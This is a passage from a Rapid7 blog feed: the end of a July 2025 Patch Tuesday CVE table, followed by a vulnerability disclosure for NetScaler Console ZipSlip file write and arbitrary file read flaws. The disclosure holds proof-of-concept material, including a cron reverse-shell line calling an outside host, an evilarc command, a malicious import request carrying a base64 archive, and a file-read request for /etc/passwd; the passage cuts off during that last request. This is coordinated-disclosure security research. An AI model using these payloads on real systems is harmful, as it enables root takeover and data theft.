href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48820">CVE-2025-48820</a></td><td><p>Windows AppX Deployment Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49733">CVE-2025-49733</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47993">CVE-2025-47993</a></td><td><p>Microsoft PC Manager Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49694">CVE-2025-49694</a></td><td><p>Microsoft Brokering File System Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49693">CVE-2025-49693</a></td><td><p>Microsoft Brokering File System Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49690">CVE-2025-49690</a></td><td><p>Capability Access Management Service (camsvc) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49680">CVE-2025-49680</a></td><td><p>Windows Performance Recorder (WPR) Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49682">CVE-2025-49682</a></td><td><p>Windows Media Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49666">CVE-2025-49666</a></td><td><p>Windows Server Setup and Boot Event Collection Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.2</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49685">CVE-2025-49685</a></td><td><p>Windows Search Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49744">CVE-2025-49744</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49677">CVE-2025-49677</a></td><td><p>Microsoft Brokering File System Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47999">CVE-2025-47999</a></td><td><p>Windows Hyper-V Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48003">CVE-2025-48003</a></td><td><p>BitLocker Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48800">CVE-2025-48800</a></td><td><p>BitLocker Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48818">CVE-2025-48818</a></td><td><p>BitLocker Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48811">CVE-2025-48811</a></td><td><p>Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48803">CVE-2025-48803</a></td><td><p>Windows Virtualization-Based Security (VBS) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48802">CVE-2025-48802</a></td><td><p>Windows SMB Server Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47978">CVE-2025-47978</a></td><td><p>Windows Kerberos Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48823">CVE-2025-48823</a></td><td><p>Windows Cryptographic Services Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.9</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48002">CVE-2025-48002</a></td><td><p>Windows Hyper-V Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-36357">CVE-2025-36357</a></td><td><p>AMD: CVE-2025-36357 Transient Scheduler Attack in L1 Data Queue</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.6</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-36350">CVE-2025-36350</a></td><td><p>AMD: CVE-2024-36350 Transient Scheduler Attack in Store Queue</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.6</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48809">CVE-2025-48809</a></td><td><p>Windows Secure Kernel Mode Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48810">CVE-2025-48810</a></td><td><p>Windows Secure Kernel Mode Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26636">CVE-2025-26636</a></td><td><p>Windows Kernel Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49760">CVE-2025-49760</a></td><td><p>Windows Storage Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>3.5</p></td></tr></tbody></table><h2>Update history</h2><ul><li>2025-07-11: updated section about missing Microsoft security advisories.</li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/patch-tuesday-july-2025</link>
      <guid isPermaLink="false">blt3f5526be2cd4cf79</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Tue, 15 Jul 2025 09:30:13 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt76ee31e15f145bd9/6849a5d2dc186db607081f3e/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2025-4365/CVE-2024-12284: NetScaler Console/SDX Authenticated Arbitrary File Read/Write (FIXED)]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>During root cause analysis for the NetScaler Console vulnerability, </span><span style='font-size: undefined;'><span data-type='inlineCode'>CVE-2024-6235</span></span><span style='font-size: undefined;'>, Rapid7 discovered two high severity authenticated arbitrary file read and write vulnerabilities which were disclosed to the vendor in accordance with our </span><a href="https://www.rapid7.com/security/disclosure/"><span style='font-size: undefined;'>disclosure policy</span></a><span style='font-size: undefined;'>. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>An Arbitrary File Read vulnerability (</span><span style='font-size: undefined;'><span data-type='inlineCode'>CVE-2025-4365</span></span><span style='font-size: undefined;'>) was identified in NetScaler Console version </span><span style='font-size: undefined;'><span data-type='inlineCode'>14.1.8.50</span></span><span style='font-size: undefined;'> and found to affect versions of NetScaler Console and NetScaler SDX </span><span style='font-size: undefined;'><span data-type='inlineCode'>14.1</span></span><span style='font-size: undefined;'> before </span><span data-type='inlineCode'>14.1.47.46</span> and <span data-type='inlineCode'>13.1</span> before <span data-type='inlineCode'>13.1.58.32</span>, as per the vendor <a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694729&amp;articleURL=NetScaler_Console_and_NetScaler_SDX_SVM_Security_Bulletin_for_CVE_2025_4365" target="_self">advisory</a>.</p><p style="direction: ltr;"><span style='font-size: undefined;'>An Arbitrary File Write vulnerability was identified in NetScaler Console version </span><span style='font-size: undefined;'><span data-type='inlineCode'>14.1.8.50</span></span><span style='font-size: undefined;'>. After disclosing to the vendor, the vendor reported this issue as already being fixed in the latest version of the product. The vendor, who is a Vendor CVE Numbering Authority (CNA), has indicated that no CVE will be assigned for this Arbitrary File Write vulnerability as it did not affect the latest version of the product at the time of disclosure. With no CVE assigned, and no vendor security bulletin available for this vulnerability, it is not clear which versions of the product are affected by this vulnerability, outside of the versions Rapid7 was able to test (</span><span style='font-size: undefined;'><span data-type='inlineCode'>14.1.8.50</span></span><span style='font-size: undefined;'> which was vulnerable, and </span><span style='font-size: undefined;'><span data-type='inlineCode'>14.1.29.63</span></span><span style='font-size: undefined;'> which was not vulnerable). As the vulnerability is known to be fixed in the latest version of the product, affected users can update to the latest version in order to remediate it.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Both of these vulnerabilities can be chained with the authentication bypass vulnerability </span><a href="https://attackerkb.com/topics/7zebEgmGLs/cve-2024-6235" target="_self"><span style='font-size: undefined;'><span data-type='inlineCode'>CVE-2024-6235</span></span></a><span style='font-size: undefined;'>, to exploit them without authentication.</span></p><p><em>Update June 27, 2025:</em> After further investigation from the vendor, it has been determined that the Arbitrary File Write vulnerability should be identified as CVE-2024-12284. This vulnerability is now known to affect both NetScaler Console and NetScaler Agent <span data-type='inlineCode'>14.1</span> before <span data-type='inlineCode'>14.1-38.53</span>, and <span data-type='inlineCode'>13.1</span> before <span data-type='inlineCode'>13.1-56.18,</span> as per the vendor <a href="https://support.citrix.com/external/article?articleUrl=CTX692579-netscaler-console-and-netscaler-agent-security-bulletin-for-cve202412284&amp;language=en_US" target="_self">advisory</a>.</p><h2><span style='font-size: undefined;'>Product Description</span></h2><p style="direction: ltr;"><a href="https://docs.netscaler.com/en-us/netscaler-application-delivery-management-software" target="_self"><span style='font-size: undefined;'>NetScaler Console</span></a><span style='font-size: undefined;'> (previously ADM) is a platform for policy management across devices and applications in an organization, often deployed at the edge of a corporate network, and hence an attractive target for ransomware operators. </span></p><h2><span style='font-size: undefined;'>Impact</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>By exploiting these issues, an authenticated attacker can read or create arbitrary files on the file system. As the Arbitrary File Write can create files with permissions akin to the root user, it's possible to leverage this to achieve remote code execution as root. By chaining these issues with the authentication bypass </span><span style='font-size: undefined;'><span data-type='inlineCode'>CVE-2024-6235</span></span><span style='font-size: undefined;'>, an attacker can achieve unauthenticated remote code execution.</span></p><h2><span style='font-size: undefined;'>Credit</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>These vulnerabilities were discovered by Calum Hutton, Senior Security Researcher at Rapid7 and are being disclosed in accordance with </span><a href="https://www.rapid7.com/security/disclosure/" target="_self"><span style='font-size: undefined;'>Rapid7's vulnerability disclosure policy</span></a><span style='font-size: undefined;'>.</span></p><h2>Exploitation</h2><h3>CVE-2024-12284<span style='color:rgb(67, 67, 67);font-size: undefined;'>: Authenticated Arbitrary File Write via ZipSlip</span></h3><h4><span style='color:rgb(102, 102, 102);font-size: undefined;'>Overview</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>An authenticated admin user can import </span><a href="https://docs.netscaler.com/en-us/netscaler-console-service/stylebooks.html" target="_self"><span style='font-size: undefined;'>StyleBooks</span></a><span style='font-size: undefined;'> into the system in several formats including </span><span style='font-size: undefined;'><span data-type='inlineCode'>ZIP</span></span><span style='font-size: undefined;'> or </span><span style='font-size: undefined;'><span data-type='inlineCode'>TAR</span></span><span style='font-size: undefined;'> archives. A lack of validation of the files within the archive prior to extraction results in an arbitrary file write, due to path traversal characters in the path of a file within the archive (aka ZipSlip). As the process performing the archive extraction is running with permissions equivalent to root, the file can be written to any path on the system and can lead to remote command execution as the root user.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The StyleBook API runs as a separate Python microservice on the NetScaler appliance. We determined that the source code was likely located in </span></p><p><span style='font-size: undefined;'></span></p><pre language="html">bash-3.2# ls -la /var/python/lib/python3.7/site-packages/NetScalerStyleBooks-1.0-py3.7.egg/
EGG-INFO/         SBConfigEngine/   SBException/      SBInfra/          SBMigration/      SBParser/         stylebook_engine/ tests_unittest/</pre><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>Using </span><span style='font-size: undefined;'><span data-type='inlineCode'>uncompye6</span></span><span style='font-size: undefined;'> it was possible to decompile the Python bytecode </span><span style='font-size: undefined;'><span data-type='inlineCode'>.pyc</span></span><span style='font-size: undefined;'> files back into </span><span style='font-size: undefined;'><span data-type='inlineCode'>.py</span></span><span style='font-size: undefined;'> files. We located the API logic responsible for handling the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/stylebook/nitro/v2/config/stylebooks/actions/import</span></span><span style='font-size: undefined;'> API endpoint in the SBEngineStyleBookRestAPIHandler class:</span></p><p><span style='font-size: undefined;'></span></p><pre language="html"><span style='font-size: undefined;'>from mpspython.infra.mpsfile import MPSFile as SBFile

class SBEngineStyleBookRestAPIHandler(STYLEBOOKENGINEResource):
</span>    <span style='font-size: undefined;'>...
</span>   <span style='font-size: undefined;'>def do_post(self, input_data=None, block_types=None):
</span>        <span style='font-size: undefined;'>self.info("Received request to import a stylebook definition")
</span>        <span style='font-size: undefined;'>try:
</span>            <span style='font-size: undefined;'>sb_list, sb_bundle_dir = self._validate_and_get_input_data(input_data)
...
</span>    <span style='font-size: undefined;'>def _validate_and_get_input_data(self, input_data=None, is_update_stylebook=False):
</span>        <span style='font-size: undefined;'>...
</span>                <span style='font-size: undefined;'>if "content" in definition:
</span>                    <span style='font-size: undefined;'>if "file_name" in definition:
</span>                        <span style='font-size: undefined;'>contents = base64.b64decode(definition["content"])
</span>                        <span style='font-size: undefined;'>file_name = definition["file_name"]
</span>                        <span style='font-size: undefined;'>self.is_bundle = True
</span>                        <span style='font-size: undefined;'>is_filename_secure = SBUtil.is_filename_secure(file_name)
</span>                        <span style='font-size: undefined;'>if not is_filename_secure:
</span>                            <span style='font-size: undefined;'>self.logger.error("Insecure stylebook bundle name")
</span>                            <span style='font-size: undefined;'>self.raise_exception(524, "error", "Filename has invalid characters")
</span>                        <span style='font-size: undefined;'>directory_name = file_name + "_" + SBUtil.get_new_uid()
</span>                        <span style='font-size: undefined;'>full_path = self.sb_session.get_tenant_stylebook_import_bundle_path() + "/" + directory_name
</span>                        <span style='font-size: undefined;'>SBFile.create_directory(full_path)
</span>                        <span style='font-size: undefined;'>zip_file_path = full_path + "/" + file_name
</span>                        <span style='font-size: undefined;'>SBFile.safe_write(zip_file_path, contents)
</span>                        <span style='font-size: undefined;'>try:
</span>                            <span style='font-size: undefined;'>SBFile.unzip_file(zip_file_path, full_path)
</span>                        <span style='font-size: undefined;'>except Exception as e:</span></pre><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>The </span><span style='font-size: undefined;'><span data-type='inlineCode'>do_post()</span></span><span style='font-size: undefined;'> method calls </span><span style='font-size: undefined;'><span data-type='inlineCode'>_validate_and_get_input_data()</span></span><span style='font-size: undefined;'> with the request data, which processes the JSON payload and decodes the base64 within the </span><span style='font-size: undefined;'><span data-type='inlineCode'>content</span></span><span style='font-size: undefined;'> attribute. The file data is written using </span><span style='font-size: undefined;'><span data-type='inlineCode'>SBFile.safe_write()</span></span><span style='font-size: undefined;'>, then the </span><span style='font-size: undefined;'><span data-type='inlineCode'>SBFile.unzip_file()</span></span><span style='font-size: undefined;'> method is called. The </span><span style='font-size: undefined;'><span data-type='inlineCode'>SBFile</span></span><span style='font-size: undefined;'> object is imported at the top of the file and is an alias of </span><span style='font-size: undefined;'><span data-type='inlineCode'>mpspython.infra.mpsfile.MPSFile</span></span><span style='font-size: undefined;'>, located in </span><span style='font-size: undefined;'><span data-type='inlineCode'>/var/python/lib/python3.7/site-packages/MPSPython-1.0-py3.7.egg</span></span><span style='font-size: undefined;'>: </span></p><p><span style='font-size: undefined;'></span></p><pre language="html"><span style='font-size: undefined;'>class MPSFile(object):
</span>    <span style='font-size: undefined;'>...

</span>    <span style='font-size: undefined;'>@staticmethod
</span>        <span style='font-size: undefined;'>def unzip_file(src_file, dest_file_path):
</span>        <span style='font-size: undefined;'>if src_file.endswith(".tgz") or src_file.endswith(".gz"):
</span>            <span style='font-size: undefined;'>execute = 100
</span>            <span style='font-size: undefined;'>read = 400
</span>            <span style='font-size: undefined;'>dir_perm = execute
</span>            <span style='font-size: undefined;'>file_perm = execute | read
</span>            <span style='font-size: undefined;'>tar = tarfile.open(src_file)
</span>            <span style='font-size: undefined;'>for tarinfo in tar.getmembers():
</span>                <span style='font-size: undefined;'>tarinfo.mode |= dir_perm if tarinfo.isdir() else file_perm

</span>            <span style='font-size: undefined;'>tar.extractall(dest_file_path)
</span>            <span style='font-size: undefined;'>tar.close()
</span>        <span style='font-size: undefined;'>else:</span></pre><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>If the StyleBook archive is a tar-gzipped file, and the source file name ends with </span><span style='font-size: undefined;'><span data-type='inlineCode'>.tgz</span></span><span style='font-size: undefined;'> or </span><span style='font-size: undefined;'><span data-type='inlineCode'>.gz</span></span><span style='font-size: undefined;'>, the </span><span style='font-size: undefined;'><span data-type='inlineCode'>unzip_file()</span></span><span style='font-size: undefined;'> method uses </span><span style='font-size: undefined;'><span data-type='inlineCode'>tarfile.extractall()</span></span><span style='font-size: undefined;'> to extract the contents of the tar file, without validation, which is vulnerable to ZipSlip when processing malicious archives (see the warning in the official Python </span><a href="https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall" target="_self"><span style='font-size: undefined;'>docs</span></a><span style='font-size: undefined;'> for the function).</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We identified that the arbitrary file write was occurring as user </span><span style='font-size: undefined;'><span data-type='inlineCode'>1000</span></span><span style='font-size: undefined;'> who has equivalent rights as the root user and could write to any file path on the system, including the root path (</span><span style='font-size: undefined;'><span data-type='inlineCode'>/</span></span><span style='font-size: undefined;'>). </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We created a cron job with a reverse shell, and included it in the malicious archive, attempting to write the BSD cronfile for the root user at </span><span style='font-size: undefined;'><span data-type='inlineCode'>/var/cron/tabs/root</span></span><span style='font-size: undefined;'> and trigger a shell as the root user.</span></p><p><span style='font-size: undefined;'></span></p><pre language="html"><span style='font-size: undefined;'>$ cat ~/poc/netscaler/root
SHELL=/usr/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin
MAILTO=""
* * * * * bash -i &gt;& /dev/tcp/192.168.178.103/4444 0&gt;&1</span>
<span style='font-size: undefined;'>$ python2 evilarc.py -d 7 -o unix -f /tmp/mystylebook.tar.gz -p var/cron/tabs/ ~/poc/netscaler/root
Creating /tmp/mystylebook.tar.gz containing ../../../../../../../var/cron/tabs/root</span></pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Uploading the malicious StyleBook caused the file to be written at </span><span style='font-size: undefined;'><span data-type='inlineCode'>/var/cron/tabs/root</span></span><span style='font-size: undefined;'> as user </span><span style='font-size: undefined;'><span data-type='inlineCode'>1000</span></span><span style='font-size: undefined;'>:</span></p><p><span style='font-size: undefined;'></span></p><pre language="html"><span style='font-size: undefined;'>bash-3.2# ls -la /var/cron/tabs      
total 12
drwx------  2 root  wheel  512 Apr  8 10:46 .
drwx------  3 root  wheel  512 Mar 26 16:16 ..
-rwxrw-r--  1 1000  1000   154 Apr  8 08:29 root</span></pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>A shell is opened shortly after opening a netcat listener on the target host:</span></p><p><span style='font-size: undefined;'></span></p><pre language="html"><span style='font-size: undefined;'>$ nc -nvlp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.178.222 24032
bash: no job control in this shell
bash-3.2# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)</span></pre><p><span style='font-size: undefined;'></span></p><h4><span style='color:rgb(102, 102, 102);font-size: undefined;'>PoC</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>Create a malicious archive using </span><a href="https://github.com/ptoomey3/evilarc" target="_self"><span style='font-size: undefined;'>https://github.com/ptoomey3/evilarc</span></a><span style='font-size: undefined;'> or similar, i.e.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>$ python2 evilarc.py -d 7 -o unix -f /tmp/mystylebook.tar.gz -p var/cron/tabs/ ~/poc/netscaler/root</span></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Upload the malicious archive as base64 data as with the below request to trigger the arbitrary file write:</span></p><p><span style='font-size: undefined;'></span></p><pre language="html">POST /stylebook/nitro/v2/config/stylebooks/actions/import?mode=async HTTP/1.1
Host: 192.168.178.222
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.178.222/admin_ui/mas/ent/html/main.html
Content-Type: application/json
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
NITRO_WEB_APPLICATION: true
rand_key: c24e9915bab19188621de22342d01799
Content-Length: 426
Origin: http://192.168.178.222
Connection: keep-alive
Cookie: rdx_pagination_size=250%20Per%20Page; startin=/admin_ui/mas/ent/html/main.html; version_status=true; user_rand=undefined; skip_ftu_flow_temp=true; logged_in_user_name=nsroot; SESSID=##FFEE4BAEFEDE58E016290444E90C32A6CBEEE60AA677D697B7588E4FD185; license_types=3; url_enabled=1; domain_enabled=0; cr_enabled=0; sla_enabled=1
Priority: u=0
{"import":{"file_name":"mystylebook.tar.gz","content":"H4sICB7p9GcC/215c3R5bGVib29rLnRhcgDt0N1KwzAUB/Bc5ynCLnYhmJPTtckUOtiFMKGi4F4grcIGc5Wk3fObTi0DYV4IwuD/y8fJyQmBRGvSP/rBB2pCu6fO15FC23biL0xibT5EdoU5jUfZLBOcO1dw4dg6YdjatKWM+Ad97HxQSjR+17+dOfdb/estY7wQz6u7qiqpj4Hq7Z5qHzfyablelRRTfkvHaajGcTUudm36lJPCZ55S+bC8r9aP5WQi5ZX6bsPd6nqrFlNFL68H6pp34ptMs51rdmmYGeWJMospSykAAAAAAAAAAAAAAAAAAAAAAADgjA+RuElNACgAAA==","encoding":"base64"}}</pre><h3><span style='color:rgb(102, 102, 102);'></span></h3><h4><span style='color:rgb(102, 102, 102);'>Impact</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>This is an authenticated vulnerability which does reduce the risk of exploitation somewhat. However, there are known authentication bypass vulnerabilities affecting the same version of the software that could be leveraged to exploit this issue without authentication (CVE-2024-6235). Due to this, and the fact that the arbitrary file write is occurring as the root user, the impact of exploiting this issue is high and could potentially result in system takeover. </span></p><p></p><h3><span style='color:rgb(67, 67, 67);'>CVE-2025-4365: Authenticated Arbitrary File Read</span></h3><h4><span style='color:rgb(102, 102, 102);'>Overview</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>An authenticated admin user can craft a HTTP request to read arbitrary files on the system. Validation of the file path does not occur before the file content is returned, resulting in sensitive information disclosure.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The NetScaler Console download API uses the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/nitro/v1/download</span></span><span style='font-size: undefined;'> endpoint and is used for various download operations, a typical file download request being as follows, note the download path is included in the URL following the API endpoint, in the following example the path </span><span style='font-size: undefined;'><span data-type='inlineCode'>mas_agent_image/nsroot/templates/nsroot.yaml</span></span><span style='font-size: undefined;'> maps to to temporary path on the file system at: </span><span style='font-size: undefined;'><span data-type='inlineCode'>/var/mps/tenants/root/tenants/Owner/k8s_agt_temp/##F1BFBD39EEA5C2281699D1B2AEF97DF2B482813653C0F0F83AC0CEC506B7/nsroot/templates/nsroot.yaml</span></span></p><p><span style='font-size: undefined;'><span data-type='inlineCode'></span></span></p><pre language="html"><span style='font-size: undefined;'>GET /nitro/v1/download/mas_agent_image/nsroot/templates/nsroot.yaml HTTP/1.1
Host: 192.168.178.222
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.178.222/admin_ui/mas/ent/html/main.html
Connection: keep-alive
Cookie: rdx_pagination_size=25%20Per%20Page; skip_ftu_flow_temp=true; logged_in_user_name=nsroot; SESSID=##700D4869F24C83881ABB8A24396DFD0A6466CF71A6DB9BE8EDDDCF97191D; user_rand=undefined; startin=/admin_ui/mas/ent/html/main.html; version_status=true; license_types=3; url_enabled=1; domain_enabled=0; cr_enabled=0; sla_enabled=1
Upgrade-Insecure-Requests: 1
Priority: u=4</span></pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>While reviewing Python source code on the NetScaler appliance, namely </span><span style='font-size: undefined;'><span data-type='inlineCode'>/mps/python/util/agentFileUploadDownload.py</span></span><span style='font-size: undefined;'>, an alternative usage of the download API was identified, see the following code snippet:</span></p><p></p><pre language="html"><span style='font-size: undefined;'>class agentFileUploadDownload:

</span>    <span style='font-size: undefined;'>def download(self, sessionid, serverIP, localPath, remotePath, agentId, rowid, token, customerid, servicename, traceinfo):
</span>        <span style='font-size: undefined;'>payload = ""
</span>        <span style='font-size: undefined;'>context = ""
</span>        <span style='font-size: undefined;'>global CERT_BUNDLE_PATH
</span>        <span style='font-size: undefined;'>file_name = os.path.basename(localPath)
</span>        <span style='font-size: undefined;'>if traceinfo and customerid:
</span>            <span style='font-size: undefined;'>context = "%s %s" %(traceinfo, customerid) 
</span>        <span style='font-size: undefined;'>try:
</span>            <span style='font-size: undefined;'>logger.info("Download file %s started from NetScaler Console %s" %(file_name, context))
</span>            <span style='font-size: undefined;'>if customerid == "Owner":
</span>                <span style='font-size: undefined;'>URL = "https://" + serverIP + "/nitro/v1/download"
</span>                <span style='font-size: undefined;'>CERT_BUNDLE_PATH = False
</span>            <span style='font-size: undefined;'>else:
</span>                <span style='font-size: undefined;'>URL = "https://" + serverIP + "/" + customerid + \
</span>                    <span style='font-size: undefined;'>"/" + servicename + "/nitro/v1/download"
</span>            <span style='font-size: undefined;'>headers = {'Authorization': "CWSAuth service=" + token, 'Cookie': 'SESSID=' + sessionid,
</span>                       <span style='font-size: undefined;'>'agent-id': agentId, 'file': remotePath, 'row-id': rowid, 'File-Source': 'Agent'}</span></pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The URL in the code equates to the same download API as before but the file path is not set in the URL but in a </span><span style='font-size: undefined;'><span data-type='inlineCode'>file</span></span><span style='font-size: undefined;'> header instead. Other interesting headers are also exposed. By using a combination of the </span><span style='font-size: undefined;'><span data-type='inlineCode'>file</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>Authorization</span></span><span style='font-size: undefined;'> headers disclosed above, it’s possible to read arbitrary files on the system.</span></p><h4><span style='color:rgb(102, 102, 102);'>PoC  </span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>The following HTTP request and response highlights this issue, by using a dummy value for the </span><span style='font-size: undefined;'><span data-type='inlineCode'>Authorization</span></span><span style='font-size: undefined;'> header, and </span><span style='font-size: undefined;'><span data-type='inlineCode'>/etc/passwd</span></span><span style='font-size: undefined;'> for the </span><span style='font-size: undefined;'><span data-type='inlineCode'>file</span></span><span style='font-size: undefined;'> header, the content of the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/etc/passwd</span></span><span style='font-size: undefined;'> file is included in the response. </span></p><p><span style='font-size: undefined;'></span></p><pre language="html"><span style='font-size: undefined;'>GET /nitro/v1/download HTTP/1.1
Host: 192.168.178.223
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.178.223/admin_ui/mas/ent/html/main.html
Connection: keep-alive
